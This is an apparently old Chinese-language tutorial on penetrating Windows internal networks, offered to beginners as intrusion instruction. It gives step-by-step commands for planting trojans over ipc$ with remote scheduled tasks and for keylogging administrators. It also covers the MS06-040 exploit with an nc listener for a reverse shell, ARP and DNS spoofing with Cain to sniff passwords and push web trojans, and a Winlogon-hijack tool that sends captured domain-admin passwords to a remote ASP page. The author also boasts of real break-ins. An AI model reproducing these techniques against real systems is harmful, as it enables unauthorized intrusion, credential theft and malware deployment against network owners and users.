精典详细内网渗透专题文章

而对于2000的系统我们直接可以用MT读出密码，直接运行mt -findpass,如图22所示

，为什么要破解本机密码，因为在内网渗透的过程中抓出一台管理员的密码是很重要的，现在我们有了内网一台机器了，当然要继续渗透下去，在这里我总结一下几种方法，方法一、扫描弱口令，ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗，DNS欺骗。方法五、域结构下的渗透。这里简单的总结五方面，但是每一方面具体利用起来又包括很细节在里面。

方法一、扫描弱口令，ipc$连接。

可以用XScan-v3.3扫描器扫一下内网，设置好IP和端口，端口设置可以查看本机装有什么软件，例如本机装有radmin，pcAnywhere等等，那我们就扫描4899,5631等端口，如图23，

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

然后用本机的知道的密码去连接。当然如果改成别的端口我们根据情况转换一下，有的时候在外网的机器很坚固，到了内网的时候就很脆弱了。当然现在机器已经很少弱口令了，但是我们有本机管理员帐户和密码，管理员为了方便往往都设置成一样的，因为做系统的时候做完一台直接GHOST别的系统。而ipc$连接可以是说是非常古老和经典的。

IPC 是Internet Process Connection的缩写，也就是远程网络连接。WindowsNT/2000/XP/2003默认都提供了IPC$管道连接，就是在两个计算机进程之间建立通信连接。打个比方，IPC连接就像是挖好的地道，程序可通过地道访问远程主机。默认情况下，IPC是共享的，也就是说微软已经为我们挖好了这个地道（IPC），因此，这种基于IPC的入侵也常常被简称为IPC入侵。 IPC 后面的$是共享的意思，不过是隐藏的共享，微软系统中用“$”表示隐藏的共享，比如C$就是隐藏的共享C盘。也就是说C盘是共享的。ipc$连接这个只能说是管理员开的共享，严格来说不能算一个漏洞，目标主机还需满足两个条件：1、目标主机开启了ipc$共享 ；2、拥有目标主机的管理员帐号和密码 。 当年在2000系统的时候ipc$入侵可以说是风扉一时。

这里我用两台XP做演示，打开命令提示符在CMD下输入：net use IPipc$ "password" /user:"username" 建立非空连接，接着copy 路径*.exe IP共享目录名，向远程主机复制文件，接着net time IP，查看远程主机的当前时间，图24所示

，接着就可以用计划任务运行我们COPY过去的程序了，执行at ip 时间 程序名，远程添加计划任务，图25所示。

可以按照我们规定的时间内运行程序，如果对方禁止了计划任务，默认是开启的，我们可以把文件复制到对方启动目录，先执行net use z: IPc$，是把对方C盘映射到本机Z盘上，这样我们直接将木马放在启动目录，如图26所示。

等复制完了想断开了可以用命令，net use z: /del /y，这样可以删除映射的z盘 如果有朋友也手工输入命令麻烦，也可以用20CN的IPC扫描器，可以同步植入木马。如图27所示。

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

在域控的环境中，我们只要得到域控密码就可以直接用ipc连接管理员机器种马。后面会介绍域环境下的渗透。


方法二、靠自己的运气和管理员的懒惰加社会工程学。（推荐非安全出的黑客社会工程学攻击一书）

这里所说的运气是刚才说过的，比如说管理员为了方便设置“密码一卡通”扫描内网开3389端口的机器，用破出来的本机密码连接所有开3389的机器，我曾经入侵一个台湾的内网就是密码都是一样的，或者可以在本机装上键盘记录，安装键盘记录的目地不光是记录本机密码，是记录管理员一切的密码，比如说信箱，WEB网页密码等等，这样也可以得到管理员的很多信息。

这里我用的是键盘记录大师，首先运行keyboardlog.exe，然后点"开起监控"，注意这个程序只要运行一次就可以了，以后开机的时候自动运行。程序运行后如图28的界面，

我们点击开始监控就可以了。这个工具可以记录中文，这点对于有些机器还是不错的，记录的文件可以设置，方法为修改config.ini里的文件. 格式为如 c:1111.txt,然后再运行keyboardlog.exe,点击停止监控，然后再重新点开始监控。如图29是记录到的内容。

至于记录的什么内容就要靠大家去分析然后配合社会工程学了。


方法三、内网溢出。

溢出从技术角度可以分为堆溢出和栈溢出，这点我们先不说，从另一个角度则分为远程（remote）溢出和本地（local）溢出，远程溢出也就是通过对方的一些网络上的服务对我们提交的的数据没有严格的检查，我们提交一些精心构造的数据，可以迫使对方的主机执行我们指定的动作：比如添加用户，打开端口，反弹一个SHELL给我们等等。

这种方法放在现在来说可以说是成功率很低的，因为现在基本都是自己打补丁了，如果在向后退个二三年还是可以的，但并不代表没有一点不可能，06的时候朽木在腾讯内网的时候就是靠嗅域管理员的哈希和MS06035溢出其他的机器，对于比较火的05年的MS05039,06年的MS06035、06040，07年DNS溢出等等，这就需要我们多关注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微软漏洞发布的地方，当然内网溢出不一定非得靠系统漏洞，可以查看本机装有那些第三方程序，然后溢出其他机器的，这里我以06040+2000系统为例，首先我们用Superscan3.0扫描内网开放445端口，如30所示。

 

在本机用NC监听1234端口，执行nc -l -v -p 1234，如图31，

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

然后用另一个CMD窗口执行，ms06040rpc 对方IP 本机IP 1234 1，这样用NC监听的端口会返回了对方的CMDSHELL，如图32、33所示。

在得到CMDSHELL之后，是添加用户或者给机器中木马，就看见大家爱好了。另外也可以用去年比较火的DNS溢出，DNS服务一般开放53端口。DNS服务器在有的时候就是域服务器，关于域环境下参考方法五。





方法四、arp欺骗，DNS欺骗。

这个方法是比较实用，所以多介绍一下。但同是也是比较容易暴露自己的，不少同行在C段方面和内网方面用的都是ARP欺骗，不少菜菜可能还记得杂志经常看到嗅探的时候用到的ARP欺骗，我们再来复习一下吧。首先在内网机器输入arp -a，如图34所示。

这里第一列显示的是ip地址，第二列显示的是和ip地址对应的网络接口卡的硬件地址（MAC），第三列是该ip和mac的对应关系类型。可见，arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议，或者说ARP协议是一种将ip地址转化成MAC地址的一种协议。它靠维持在内存中保存的一张表来使ip得以在网络上被目标机器应答。

1、什么是MAC地址、MAC地址也叫物理地址，硬件地址或链路地址，同网络设备制造商生产时写在硬件内部。IP地址与MAC地址在计算机里都是以二进制表示的。IP地址是32位的，而MAC地址则是48位的。MAC地址的长度为48位（6个字节），通常表示为12个16进制数，每2个16进制之间用冒号隔开，如08:00:20:0A:8C:6D就是一个MAC地址，其中前3位16进制数08:00:20代表网络硬件制造商的编号，它由IEEE（电子与电子工程师协会）分配，而后3位16进制数0A:8C:6D代表该制造商所制造的某个网络产品（如网卡）的系列号。输入ipconfig /all就可以看见本机的MAC地址。

2、什么是ARP，大家都知道计算机通信是要有IP地址的吧！可是在局域网中，计算机之间的通信是只靠MAC地址来发送数据的。ARP是一种协议，用来实现IP地址到MAC地址的转换，假设192.168.1.1要发一个数据给192.168.1.101，它就会发出ARP广播包问：“谁是192.168.1.101？我要你的MAC地址！”这时候192.168.1.101会回答：“我是192.168.1.101，我的MAC是AA-AA-AA-AA-AA-AA。”然后192.168.1.1就会把这个回答记录下来，然后再发数据给192.168.1.101的时候就直接构造目地地址为AA-AA-AA-AA-AA-AA的数据包发送。

3、什么是ARP欺骗、经过刚才的ARP查询的过程我们知道，在询问的过程中，国为不知道到底谁才是192.168.1.101，所以192.168.1.1发出的是广播包来询问，其它的电话虽然也收到了这个包但是并不回答。假如现在有个人，192.168.1.102居心不良，想冒充192.168.1.101，他也可以给192.168.1.1发一个回答的数据包说：“我才是192.168.1.101，我的MAC地址是BB-BB-BB-BB-BB。”那么192.168.1.1就会把原先的那条记录从MAC地址表中删除掉，写入新的这个地址对应关系，这就是ARP欺骗。

4、什么是网关、在局域网中，所有的电脑可能是共用一个网络出口，这个出口就是网关了。网关可以是一台电脑，也可以是一个路由器的某个接口，它一样有自己的IP地址，局域网中所有的要发到外部的数据包都直接递交给网关，网关负责将这个数据包传递到远程网络，再将外界返回的数据分发给局域网中的指定电脑。



  　TCP/IP协议是如此的脆弱，ARP协议在设计的当初并没有充分的考虑到安全问题，所以今天才出现N多的ARP欺骗工具，在介绍工具之前，我们再来谈谈服务器在机房中的情况。一般而言，现在流行的的主机托管方式置放的服务器是和很多别的服务器放在一个机柜上，大家共用一个交换机共享100M的带宽，这样就造成了一个问题，那些没有做端口隔离的的机房（绝大多数机房都是这样的）每个交换机下的所有服务器构成一个局域网。在这个局域网下，大家就可以玩ARP欺骗了。[!--empirenews.page--]分页标题[/!--empirenews.page--]

说到ARP嗅探的工具要先提一下有一定的位置的cain，官方最新版为4.918，我们先要进行安装，如图35所示。

直接NEXT下一步就可以了，安装好我们运行CAIN，点击Sniffer，在选择工具栏第二个按钮，在点击十字架，在弹出对话框中我们选择子网中所有计算机，如图36所示。

 

在Configure选项里我们可以根据需要选择端口，如21、80、3389等。如图37所示。

这时在选择下面的ARP，十字按钮是灰色的，我们点击一下空白处，在选择十字按钮，在弹出的对话框里左边选择网关，右边选择欺骗的IP。最后点开始嗅探，上面第二个按钮。如图38所示。

这样就能嗅到数据了，图39是嗅到的HTTP密码。

另外如果嗅到了3389密码我们在上面打开文档，在里面可以找到密码，如图40所示。

大家在用CAIN嗅探的时候可能遇到过这样的情况，数据一大就当机了，过了很少时间都连不上了，所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。这样会大大的减少当机的可能性。如果看到丢包率超过10%就要注意啦，赶紧停掉，看看那里没设置好吧。另外提供一个“chong”写的BAT程序，在开嗅的时候运行它就可以了。[!--empirenews.page--]分页标题[/!--empirenews.page--]

======start=========
:ping
ping g.cn
IF ERRORLEVEL   1 GOTO reboot
IF ERRORLEVEL   0 GOTO ping
:reboot
iisreset /reboot
======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 （事先自己先测试下）。

在说下DSN欺骗，我们看下DNS是怎样工作的，DNS是全称是Domain Name Server，既域名服务器。当一台主机发送一个请求要求解析某个域名时，他会首先把解析请求发到自己的DNS服务器上。如果内网里的192.168.1.101要访问百度www.baidu.com，但不知道其IP地址，这时192.168.1.101主机询问网关192.168.1.1，www.baidu.com的IP是多少，如果这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页木马的IP，这样就实现了DNS域名欺骗。



首先用前面的介绍的列出内网机器，然后在ARP里选择ARP-DNS，点击空白处激活十字按钮，弹出一个DNS欺骗对话框，在请求DNS域名栏中填入对方要访问的网站，如www.baidu.com，然后在用来改写响应的IP地栏，如图41所示。

而我们响应的地址可以是一个网页木马的地址，这里我以网关为例，也就是说192.168.1.101访问www.baidu.com的时候会转向192.168.1.1的页面，我们先来访问一下192.168.1.1，如图42所示，

我们在192.168.1.104的机器上装CAIN开始DSN欺骗后访问百度网页，如图43所示。

是不是也和192.168.1.1一样了，如果我们在本架设一个HTTP服务器，挂上一个网马后，就能欺骗访问者了，当然如果想做的更像，可以制作一个和欺骗主页一样的页面。




方法五、域结构下的渗透。

在入侵域结构内网之前我们先来了解一下什么是域，可能大家对工作组比较熟悉了，而域和工作组是不一样的，工作组是一群计算机的集合，它仅仅是一个逻辑的集合，各自计算机还是各自管理的，你要访问其中的计算机，还是要到被访问计算机上来实现用户验证的。而域不同，域是一个有安全边界的计算机集合，在同一个域中的计算机彼此之间已经建立了信任关系，在域内访问其他机器，不再需要被访问机器的许可了。也就是域用户登录，超级大的权限。而域还可以扩展，像域树，域林。在一个网络中既可以有多个多级子域、域树，还可以有多个林。[!--empirenews.page--]分页标题[/!--empirenews.page--]

   为了大家好理解，我这里举个例子，例如一个内网是一个大楼，而每层的每个房间是一台计算机，当然每个房间的钥匙只有房间的主人才拥有，但大楼建立一个保安室，而这保安室为了管理方便有一把可以打开任意房间的钥匙。前题是这个房间允许加入保安的管理范围内，这个保安室就是域控制器，当然在形象的说大楼可以是10层，而每一层都有一个保安室，也可以有一个总的保安室。当然在往大的说也可以有很多大楼，大楼与大楼之间为了方便也可以建立共享。如活动目录的域，活动目录可以贯穿一个或多个域。在独立的计算机上，域即指计算机本身，一个域可以分布在多个物理位置上，同时一个物理位置又可以划分不同网段为不同的域，每个域都有自己的安全策略以及它与其他域的信任关系。当多个域通过信任关系连接起来之后，活动目录可以被多个信任域域共享。在往回说每台机器像一个树叶，而我们控制了树叶，还想控制树杈，而最后还想控制这个大树，这时候就到域根了。而一棵树是在一片森林当中的。

在入侵内网的时候，一般先用net view查看内网的情况，列出共享的域、计算机或资源的列表。如图44所示。

如何判断有没有域呢，其实一个ipconfig /all基本就看出来了，大家在回到图7当中，注意一下第二项，也就是Primary Dns Suffix这项，从这个命令我们可以得知，存在一个域xxxx-cc.com，我们ping一下域xxxx-cc.com，得到域服务器的ip。如图45所示。

或者用命令net config workstation，会显示本机计算机名和管理员用户名，工作站的域DNS名称及登录到的域，如图46所示。

 

接着执行net localgroup administrators来看一下本机在域里面的角色，如图47所示。

看来只是一个普通域用户。我们再来查看一下域里面有多少的用户，执行net user /domain，域里面的用户很多，如图48所示。

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

域里面这么多用户，那么我们再查看一下域管理员有哪些，执行net group "domain admins" /domain，貌似只有一个域管理员。如图49所示。

 

大家知道在域管理网络中只要搞定了域管理员内网一切机器都OK了，现在域服务器有了，域管理员有了。思路呢？可以用上面的几种方法来入侵域服务器，如ARP嗅探域服务器，而域管理器在很多时候也是DNS服务器，也可以尝试DNS溢出等。这里我为大家推荐一个Winlogon劫持记录3389密码小工具，原作者为“lovemfc”，我们用这个不是记录本机登录的3389密码，当然本机也是可以记录的，更不错的是可以记录域管理员登录本机的密码，因为域管理员是有权限登录下面每台用户的机器的。缺点是记录密码的东西只能保存本机上，而ASM根据这个写了一个发信版的生成器，这就方便我们大家了，程序运行后如图50。

 

选择好接受的ASP地址后，生成出来CreateServer.exe，直接在服务器上运行即可，post.asp会在你的URL地址下生成key.txt。适用范围2003系统，图51是我记录到本机管理员和域管理员的密码

，这下就可以纵横整个内网了。在服务器上扫描开放3389端口的，用域管理员登录全部OK，在域控的环境中，我们只要得到域控密码也可以直接用ipc连接管理员机器种马。最后登录内网几台机器抓图纪念一下，如图52。

 

最后说一下本文章只做菜鸟渗透入门文章，当然内网渗透还有其他深入的技巧，如主动会话劫持等，因本人时间和水平都有限，文章中不足之处欢迎大家批评指正。